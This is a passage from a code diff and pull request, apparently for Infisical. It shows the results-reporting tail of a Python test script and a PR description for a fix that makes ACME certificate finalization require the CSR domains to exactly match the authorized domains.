+    results.append(("CSR fewer domains rejected", test_csr_fewer_domains_rejected(profile_id, acme_key, account_url)))
+
+    print(f"\n{'='*60}")
+    print("  Results:")
+    print(f"{'='*60}")
+    all_passed = True
+    for name, passed in results:
+        status = "PASS" if passed else "FAIL"
+        if not passed: all_passed = False
+        print(f"  [{status}] {name}")
+    print(f"{'='*60}")
+
+    if all_passed:
+        print("\n  All tests passed!")
+    else:
+        print("\n  Some tests FAILED!")
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    try:
+        main()
+    except Exception as e:
+        print(f"\n[EXCEPTION] {e}")
+        traceback.print_exc()


### PR DESCRIPTION
## Context

Reject duplicate identifiers at order creation and use bijective set comparison at finalization to ensure CSR domains exactly match authorized domains.

## Screenshots

## Steps to verify the change

## Type

- [x] Fix
- [ ] Feature
- [ ] Improvement
- [ ] Breaking
- [ ] Docs
- [ ] Chore

## Checklist

- [x] Title follows the [conventional commit](https://www.conventionalcommits.org/en/v1.0.0/#summary) format: `type(scope): short description` (scope is optional, e.g., `fix: prevent crash on sync` or `fix(api): handle null response`). 
- [x] Tested locally
- [ ] Updated docs (if needed)
- [ ] Updated CLAUDE.md files (if needed)
- [x] Read the [contributing guide](https://infisical.com/docs/contributing/getting-started/overview)